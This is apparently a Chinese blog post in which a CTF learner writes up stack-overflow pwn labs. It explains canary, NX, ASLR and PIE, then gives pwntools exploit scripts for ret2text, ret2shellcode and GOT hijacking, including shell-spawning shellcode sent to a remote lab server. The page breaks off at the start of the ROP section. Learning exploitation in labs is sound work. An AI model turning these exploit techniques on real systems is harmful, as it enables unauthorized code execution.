<!DOCTYPE html>





<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=7.3.0">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=7.3.0">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=7.3.0">
  <link rel="mask-icon" href="/images/logo.svg?v=7.3.0" color="#222">

<link rel="stylesheet" href="/css/main.css?v=7.3.0">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.7.0">


<script id="hexo-configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '7.3.0',
    exturl: false,
    sidebar: {"position":"left","display":"post","offset":12,"onmobile":false},
    copycode: {"enable":false,"show_result":false,"style":null},
    back2top: {"enable":true,"sidebar":false,"scrollpercent":false},
    bookmark: {"enable":false,"color":"#222","save":"auto"},
    fancybox: false,
    mediumzoom: false,
    lazyload: false,
    pangu: false,
    algolia: {
      appID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    },
    localsearch: {"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},
    path: '',
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    translation: {
      copy_button: '复制',
      copy_success: '复制成功',
      copy_failure: '复制失败'
    },
    sidebarPadding: 40
  };
</script>

  <meta name="description" content="PWN(一)STACK OVER FLOW">
<meta name="keywords" content="搬砖工,ctf学习,pwn">
<meta property="og:type" content="article">
<meta property="og:title" content="PWN">
<meta property="og:url" content="https://lhxhl.github.io/2020/03/14/pwn/index.html">
<meta property="og:site_name" content="晚来秋">
<meta property="og:description" content="PWN(一)STACK OVER FLOW">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="https://ae01.alicdn.com/kf/U735912c1150a41768680d6c9774ced45C.jpg">
<meta property="og:image" content="https://ae01.alicdn.com/kf/U5783b636ed50476c885132e243724807h.jpg">
<meta property="og:updated_time" content="2020-03-16T17:00:34.498Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="PWN">
<meta name="twitter:description" content="PWN(一)STACK OVER FLOW">
<meta name="twitter:image" content="https://ae01.alicdn.com/kf/U735912c1150a41768680d6c9774ced45C.jpg">
  <link rel="canonical" href="https://lhxhl.github.io/2020/03/14/pwn/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome: false,
    isPost: true,
    isPage: false,
    isArchive: false
  };
</script>

  <title>PWN | 晚来秋</title>
  <meta name="generator" content="Hexo 3.9.0">
  








  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">
  <div class="container use-motion">
    <div class="headband"></div>
	<a href="https://github.com/LHXHL" class="github-corner" aria-label="View source on GitHub"><svg width="80" height="80" viewBox="0 0 250 250" style="fill:#151513; color:#fff; position: absolute; top: 0; border: 0; right: 0;" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a><style>.github-corner:hover .octo-arm{animation:octocat-wave 560ms ease-in-out}@keyframes octocat-wave{0%,100%{transform:rotate(0)}20%,60%{transform:rotate(-25deg)}40%,80%{transform:rotate(10deg)}}@media (max-width:500px){.github-corner:hover .octo-arm{animation:none}.github-corner .octo-arm{animation:octocat-wave 560ms ease-in-out}}</style>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">晚来秋</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
  </div>

  <div class="site-nav-toggle">
    <button aria-label="切换导航栏">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
      
      
      
        
        <li class="menu-item menu-item-home">
      
    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br>首页</a>

  </li>
      
      
      
        
        <li class="menu-item menu-item-tags">
      
    

    <a href="/tags/" rel="section"><i class="menu-item-icon fa fa-fw fa-tags"></i> <br>标签</a>

  </li>
      
      
      
        
        <li class="menu-item menu-item-categories">
      
    

    <a href="/categories/" rel="section"><i class="menu-item-icon fa fa-fw fa-th"></i> <br>分类</a>

  </li>
      
      
      
        
        <li class="menu-item menu-item-archives">
      
    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>归档</a>

  </li>
  </ul>

</nav>
</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
            

          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
      <article itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block post">
    <link itemprop="mainEntityOfPage" href="https://lhxhl.github.io/2020/03/14/pwn/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="晚来秋">
      <meta itemprop="description" content="高中生/CTFer/二进制萌新">
      <meta itemprop="image" content="/images/01.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="晚来秋">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">PWN

          
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              
                
              

              <time title="创建时间：2020-03-14 21:15:07" itemprop="dateCreated datePublished" datetime="2020-03-14T21:15:07+08:00">2020-03-14</time>
            </span>
          
            

            
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2020-03-17 01:00:34" itemprop="dateModified" datetime="2020-03-17T01:00:34+08:00">2020-03-17</time>
              </span>
            
          
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing"><a href="/categories/PWN/" itemprop="url" rel="index"><span itemprop="name">PWN</span></a></span>

                
                
              
            </span>
          

          
            <span class="post-meta-item" title="阅读次数">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span class="busuanzi-value" id="busuanzi_value_page_pv"></span>
            </span>
          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="PWN-一"><a href="#PWN-一" class="headerlink" title="PWN(一)"></a>PWN(一)</h1><h2 id="STACK-OVER-FLOW"><a href="#STACK-OVER-FLOW" class="headerlink" title="STACK OVER FLOW"></a>STACK OVER FLOW</h2><a id="more"></a>

<hr>
<h2 id="0x00-Introduction"><a href="#0x00-Introduction" class="headerlink" title="0x00 Introduction"></a><em>0x00 Introduction</em></h2><h3 id="这是记录我自己学PWN的一些经历-也是做个总结-方便以后回顾"><a href="#这是记录我自己学PWN的一些经历-也是做个总结-方便以后回顾" class="headerlink" title="这是记录我自己学PWN的一些经历,也是做个总结,方便以后回顾."></a>这是记录我自己学PWN的一些经历,也是做个总结,方便以后回顾.</h3><h3 id="本章所用到的是NTUSTISC-Pwn-基础教程-有UP主从youtube上搬过来的"><a href="#本章所用到的是NTUSTISC-Pwn-基础教程-有UP主从youtube上搬过来的" class="headerlink" title="本章所用到的是NTUSTISC - Pwn 基础教程,有UP主从youtube上搬过来的."></a>本章所用到的是<a href="https://www.bilibili.com/video/av80318796?t=5915&p=3" target="_blank" rel="noopener">NTUSTISC - Pwn 基础教程</a>,有UP主从youtube上搬过来的.</h3><h3 id="所用到LAB都在这里"><a href="#所用到LAB都在这里" class="headerlink" title="所用到LAB都在这里"></a>所用到LAB都在<a href="github.com/segnolin/pwn-basic-challenge">这里</a></h3><h2 id="0X01-Prior-knowledge"><a href="#0X01-Prior-knowledge" class="headerlink" title="0X01 Prior knowledge"></a><em>0X01 Prior knowledge</em></h2><p>首先汇编语言和C语言要熟练,PWN的基础很重要</p>
<h3 id="Binary-Format"><a href="#Binary-Format" class="headerlink" title="Binary Format"></a><strong><em>Binary Format</em></strong></h3><ul>
<li>Linux -ELF</li>
<li>rodata, data, code, stack, heap</li>
</ul>
<p><img src="https://ae01.alicdn.com/kf/U735912c1150a41768680d6c9774ced45C.jpg" alt></p>
<h3 id="Calling-Convention"><a href="#Calling-Convention" class="headerlink" title="Calling Convention"></a><strong><em>Calling Convention</em></strong></h3><p>x64 Calling Convention</p>
<ul>
<li>rdi, rsi, rdx, rcx, r8, r9, (push to stack)</li>
<li>rdi, rsi, rdx, r10, r8, r9, (push to stack) for system call</li>
<li>return value is stored in rax</li>
</ul>
<h3 id="Protection"><a href="#Protection" class="headerlink" title="Protection"></a><strong><em>Protection</em></strong></h3><ul>
<li>CANNARY(栈保护) –金丝雀</li>
</ul>
<p>栈溢出保护是一种缓冲区溢出攻击缓解手段，当启用栈保护后，函数开始执行的时候会先往栈里插入cookie信息，当函数真正返回的时候会验证cookie信息是否合法，如果不合法就停止程序运行。攻击者在覆盖返回地址的时候往往也会将cookie信息给覆盖掉，导致栈保护检查失败而阻止shellcode的执行。在Linux中我们将cookie信息称为canary。</p>
<ul>
<li>NX（DEP）(数据执行保护 Data Execution Prevention)</li>
</ul>
<p>NX即No-eXecute（不可执行）的意思，NX（DEP）的基本原理是将数据所在内存页标识为不可执行，当程序溢出成功转入shellcode时，程序会尝试在数据页面上执行指令，此时CPU就会抛出异常，而不是去执行恶意指令。</p>
<ul>
<li>ASLR</li>
</ul>
<p>内存地址随机化机制（address space layout randomization)，有以下三种情况：<br>0 - 表示关闭进程地址空间随机化<br>1 - 表示将mmap的基址，stack和vdso页面随机化<br>2 - 表示在1的基础上增加堆（heap）的随机化</p>
<ul>
<li>PIE (Position Independent Execution)</li>
</ul>
<p>开启后,code与data都会跟着ALSR</p>
<h3 id="Stack-Frame"><a href="#Stack-Frame" class="headerlink" title="Stack Frame"></a><strong><em>Stack Frame</em></strong></h3><ul>
<li>Function Prologue</li>
<li>Function Epilogue</li>
</ul>
<h3 id="还有就是一些工具的使用如IDA-pwntools-gdb-objdump等等"><a href="#还有就是一些工具的使用如IDA-pwntools-gdb-objdump等等" class="headerlink" title="还有就是一些工具的使用如IDA,pwntools,gdb,objdump等等.."></a>还有就是一些工具的使用如IDA,pwntools,gdb,objdump等等..</h3><h3 id="网上资料很多-主要还是多用-孰能生巧"><a href="#网上资料很多-主要还是多用-孰能生巧" class="headerlink" title="网上资料很多,主要还是多用,孰能生巧"></a>网上资料很多,主要还是多用,孰能生巧</h3><h3 id="原理这些我都引用自CTF-WIKI"><a href="#原理这些我都引用自CTF-WIKI" class="headerlink" title="原理这些我都引用自CTF-WIKI"></a><strong><em>原理这些我都引用自<a href="https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/basic-rop-zh/" target="_blank" rel="noopener">CTF-WIKI</a></em></strong></h3><h3 id="ROP-Return-Oriented-Programming-，其主要思想是在栈缓冲区溢出的基础上，利用程序中已有的小片段-gadgets-来改变某些寄存器或者变量的值，从而控制程序的执行流程。所谓-gadgets-就是以-ret-结尾的指令序列，通过这些指令序列，我们可以修改某些地址的内容，方便控制程序的执行流程。"><a href="#ROP-Return-Oriented-Programming-，其主要思想是在栈缓冲区溢出的基础上，利用程序中已有的小片段-gadgets-来改变某些寄存器或者变量的值，从而控制程序的执行流程。所谓-gadgets-就是以-ret-结尾的指令序列，通过这些指令序列，我们可以修改某些地址的内容，方便控制程序的执行流程。" class="headerlink" title="ROP(Return Oriented Programming)，其主要思想是在栈缓冲区溢出的基础上，利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值，从而控制程序的执行流程。所谓 gadgets 就是以 ret 结尾的指令序列，通过这些指令序列，我们可以修改某些地址的内容，方便控制程序的执行流程。"></a>ROP(Return Oriented Programming)，其主要思想是在栈缓冲区溢出的基础上，利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值，从而控制程序的执行流程。所谓 gadgets 就是以 ret 结尾的指令序列，通过这些指令序列，我们可以修改某些地址的内容，方便控制程序的执行流程。</h3><ul>
<li><p>程序存在溢出，并且可以控制返回地址。</p>
</li>
<li><p>可以找到满足条件的 gadgets 以及相应 gadgets 的地址。</p>
<h2 id="0x02-ret2text"><a href="#0x02-ret2text" class="headerlink" title="0x02 ret2text"></a><em>0x02 ret2text</em></h2></li>
</ul>
<h3 id="LAB-1-这是最简单的Buffer-Overflow"><a href="#LAB-1-这是最简单的Buffer-Overflow" class="headerlink" title="LAB 1 这是最简单的Buffer Overflow"></a>LAB 1 这是最简单的Buffer Overflow</h3><p>ret2text 即控制程序执行程序本身已有的的代码 (.text)。其实，这种攻击方法是一种笼统的描述。我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码 (也就是 gadgets)，这就是我们所要说的 ROP。</p>
<h3 id="exp如下"><a href="#exp如下" class="headerlink" title="exp如下:"></a>exp如下:</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#r = process('./bof1')</span></span><br><span class="line">r = remote(<span class="string">'isc.taiwan-te.ch'</span>, <span class="number">10000</span>)</span><br><span class="line"></span><br><span class="line">p = <span class="string">'a'</span> * <span class="number">0x18</span> + p64(<span class="number">0x400607</span>)</span><br><span class="line">r.recvuntil(<span class="string">'\n'</span>)</span><br><span class="line">r.sendline(p)</span><br><span class="line"></span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>

<h3 id="LAB-2-视频中没有给示范-只有思路-主要函数如下"><a href="#LAB-2-视频中没有给示范-只有思路-主要函数如下" class="headerlink" title="LAB 2 视频中没有给示范,只有思路,主要函数如下"></a>LAB 2 视频中没有给示范,只有思路,主要函数如下</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">y0u_c4n7_533_m3</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">int</span> allow = <span class="number">0</span>;</span><br><span class="line">  <span class="keyword">if</span> (allow) &#123;</span><br><span class="line">    execve(<span class="string">"/bin/sh"</span>, <span class="number">0</span>, <span class="number">0</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">"Oh no~~~!"</span>);</span><br><span class="line">    <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">char</span> buf[<span class="number">16</span>];</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"This is your second bof challenge ;)"</span>);</span><br><span class="line">  fflush(<span class="built_in">stdout</span>);</span><br><span class="line">  read(<span class="number">0</span>, buf, <span class="number">0x30</span>);</span><br><span class="line">  <span class="keyword">if</span> (<span class="built_in">strlen</span>(buf) &gt;= <span class="number">16</span>) &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">"Bye bye~~"</span>);</span><br><span class="line">    <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">  &#125;</span><br></pre></td></tr></table></figure>

<h3 id="这里需要考虑绕过strlen函数和allow两个点"><a href="#这里需要考虑绕过strlen函数和allow两个点" class="headerlink" title="这里需要考虑绕过strlen函数和allow两个点"></a>这里需要考虑绕过strlen函数和allow两个点</h3><ul>
<li>strlen用\x00绕过</li>
<li>allow可以直接到IDA找execve地址</li>
</ul>
<p>exp如下:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">p = process(<span class="string">'./bof2'</span>)</span><br><span class="line"></span><br><span class="line">shell_addr = <span class="number">0x4006AC</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">'\x00'</span> * <span class="number">0x18</span></span><br><span class="line">payload += p64(shell_addr)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">';)'</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="0x03-ret2shellcode"><a href="#0x03-ret2shellcode" class="headerlink" title="0x03 ret2shellcode"></a><em>0x03 ret2shellcode</em></h2><h3 id="LAB-3-学会利用pwntools生成shellcode"><a href="#LAB-3-学会利用pwntools生成shellcode" class="headerlink" title="LAB 3 学会利用pwntools生成shellcode"></a>LAB 3 学会利用pwntools生成shellcode</h3><p>ret2shellcode，即控制程序执行 shellcode 代码。shellcode 指的是用于完成某个功能的汇编代码，常见的功能主要是获取目标系统的 shell。一般来说，shellcode 需要我们自己填充。这其实是另外一种典型的利用方法，即此时我们需要自己去填充一些可执行的代码。</p>
<p><strong>在栈溢出的基础上，要想执行 shellcode，需要对应的 binary 在运行时，shellcode 所在的区域具有可执行权限。</strong></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">char</span> message[<span class="number">48</span>];</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">char</span> name[<span class="number">16</span>];</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">"Give me your message: "</span>);</span><br><span class="line">  fflush(<span class="built_in">stdout</span>);</span><br><span class="line">  read(<span class="number">0</span>, message, <span class="number">0x30</span>);</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">"Give me your name: "</span>);</span><br><span class="line">  fflush(<span class="built_in">stdout</span>);</span><br><span class="line">  read(<span class="number">0</span>, name, <span class="number">0x30</span>);</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="我们可以注意到-message是个Global-variables-因此IDA找到它的地址-往里写入shellcode"><a href="#我们可以注意到-message是个Global-variables-因此IDA找到它的地址-往里写入shellcode" class="headerlink" title="我们可以注意到,message是个Global variables,因此IDA找到它的地址,往里写入shellcode."></a>我们可以注意到,message是个Global variables,因此IDA找到它的地址,往里写入shellcode.</h3><p>exp如下:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">r.process(<span class="string">'./ret2sc'</span>)</span><br><span class="line"></span><br><span class="line">message_addr = <span class="number">0x601060</span></span><br><span class="line"></span><br><span class="line">context.arch = <span class="string">'amd64'</span> <span class="comment">#指明架构</span></span><br><span class="line"></span><br><span class="line">r.recvuntil(<span class="string">': '</span>)</span><br><span class="line">p = asm(shellcraft.sh())</span><br><span class="line">r.send(p)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">'a'</span> * <span class="number">0x18</span> + p64(message_addr)</span><br><span class="line">r.recvuntil(<span class="string">': '</span>)</span><br><span class="line">r.send(payload)</span><br><span class="line"></span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="0x04-GOT-Hĳacking"><a href="#0x04-GOT-Hĳacking" class="headerlink" title="0x04 GOT Hĳacking"></a><em>0x04 GOT Hĳacking</em></h2><h3 id="在这之前还需要明白"><a href="#在这之前还需要明白" class="headerlink" title="在这之前还需要明白"></a>在这之前还需要明白</h3><ul>
<li>Lazy Binding</li>
<li>Global Offset Table</li>
<li>Lazy Binding Procedure</li>
<li>GOT Hijacking</li>
<li>RELRO</li>
</ul>
<h3 id="这里需要好好理解原理-不然后面会很艰难-学pwn基础很重要-不能心急"><a href="#这里需要好好理解原理-不然后面会很艰难-学pwn基础很重要-不能心急" class="headerlink" title="这里需要好好理解原理,不然后面会很艰难(学pwn基础很重要,不能心急)"></a>这里需要好好理解原理,不然后面会很艰难(学pwn基础很重要,不能心急)</h3><h3 id="放上几篇参考文章"><a href="#放上几篇参考文章" class="headerlink" title="放上几篇参考文章:"></a>放上几篇参考文章:</h3><ul>
<li><a href="https://blog.csdn.net/linyt/article/details/51635768" target="_blank" rel="noopener">Linux动态链接中的GOT和PLT</a></li>
<li><a href="https://bbs.pediy.com/thread-257545.htm" target="_blank" rel="noopener">PLT&amp;GOT 表以及延迟绑定机制</a></li>
</ul>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">char</span> name[<span class="number">64</span>];</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">int</span> <span class="keyword">unsigned</span> <span class="keyword">long</span> <span class="keyword">long</span> addr;</span><br><span class="line">  setvbuf(<span class="built_in">stdin</span>, <span class="number">0</span>, <span class="number">2</span>, <span class="number">0</span>);</span><br><span class="line">  setvbuf(<span class="built_in">stdout</span>, <span class="number">0</span>, <span class="number">2</span>, <span class="number">0</span>);</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">"What's you name?\n"</span>);</span><br><span class="line">  read(<span class="number">0</span>, name, <span class="number">0x40</span>);</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">"Where do you want to write?\n"</span>);</span><br><span class="line">  <span class="built_in">scanf</span>(<span class="string">"%llu"</span>, &amp;addr);</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">"Data: "</span>);</span><br><span class="line">  read(<span class="number">0</span>, (<span class="keyword">char</span> *)addr, <span class="number">8</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"Done!"</span>);</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">"Thank you %s!\n"</span>, name);</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>exp如下:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="comment">#sh = process('./gothijack')</span></span><br><span class="line">sh = remote(<span class="string">'isc.taiwan-te.ch'</span>,<span class="number">10003</span>)</span><br><span class="line">context.arch = <span class="string">'amd64'</span></span><br><span class="line"></span><br><span class="line">shellcode = asm(shellcraft.sh())</span><br><span class="line">sh.recvuntil(<span class="string">'?\n'</span>)</span><br><span class="line"></span><br><span class="line">sh.send(shellcode)</span><br><span class="line"></span><br><span class="line">sh_addr = <span class="number">0x601028</span></span><br><span class="line">sh.recvuntil(<span class="string">'?\n'</span>)</span><br><span class="line">sh.sendline(str(sh_addr)) <span class="comment">#@GOT offset table of printf</span></span><br><span class="line"></span><br><span class="line">sh.sendline(p64(<span class="number">0x601080</span>)) <span class="comment">#wirite shellcode2name's address</span></span><br><span class="line"></span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="0x05-ROP"><a href="#0x05-ROP" class="headerlink" title="0x05 ROP"></a><em>0x05 ROP</em></h2><h3 id="ROP上面已经有解释过-这里在介绍下"><a href="#ROP上面已经有解释过-这里在介绍下" class="headerlink" title="ROP上面已经有解释过,这里在介绍下"></a>ROP上面已经有解释过,这里在介绍下</h3><p><strong>ROP Chain</strong></p>
<ul>
<li>由很多的 ROP gadget 所組成的</li>
<li>可以借由不同 ROP gadget 的⼩功能串成任意代码执行的效果</li>
<li>取代 shellcode 攻击</li>
</ul>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">char</span> buf[<span class="number">16</span>];</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"This is your first rop challenge ;)"</span>);</span><br><span class="line">  fflush(<span class="built_in">stdout</span>);</span><br><span class="line">  read(<span class="number">0</span>, buf, <span class="number">0x90</span>);</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="学会使用ROPgadget和grep指令搜索需要的代码"><a href="#学会使用ROPgadget和grep指令搜索需要的代码" class="headerlink" title="学会使用ROPgadget和grep指令搜索需要的代码"></a>学会使用ROPgadget和grep指令搜索需要的代码</h3><p>exp如下:</p>
